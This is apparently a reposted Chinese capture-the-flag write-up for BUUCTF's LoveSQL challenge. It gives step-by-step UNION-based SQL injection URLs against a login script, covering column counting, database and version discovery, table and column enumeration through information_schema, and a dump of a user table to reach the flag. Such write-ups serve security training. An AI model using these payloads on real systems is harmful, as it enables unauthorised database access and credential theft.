BUUCTF[极客大挑战2019]LoveSQL
Posted 热绪
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF[极客大挑战2019]LoveSQL相关的知识,希望对你有一定的参考价值。
使用单引号闭合发现:
直接上万能密码:
给了密码,95722b3a2cae53b2ada1c9146ab0bc2a 是加密的,并不能直接登录。
我们继续进行注入:
使用payload:
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=admin' order by 4%23&password=123
#这里使用 %23 是因为我们是在url中输入的,所以需要输入 # 的url编码:%23
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123
字段数:3
我们输入payload查看回显点位在哪里:
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,3 %23&password=123
注入点位在2,3;那就简单了。
查询数据库名和版本:
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,database(),version()%23&password=1
查询表名:
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'geek'%23&password=1
查询 l0ve1ysq1 表的字段名:
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'l0ve1ysq1'%23&password=1
查询字段:
http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(id,username,password)from l0ve1ysq1 %23&password=1
flag在最后!
以上是关于BUUCTF[极客大挑战2019]LoveSQL的主要内容,如果未能解决你的问题,请参考以下文章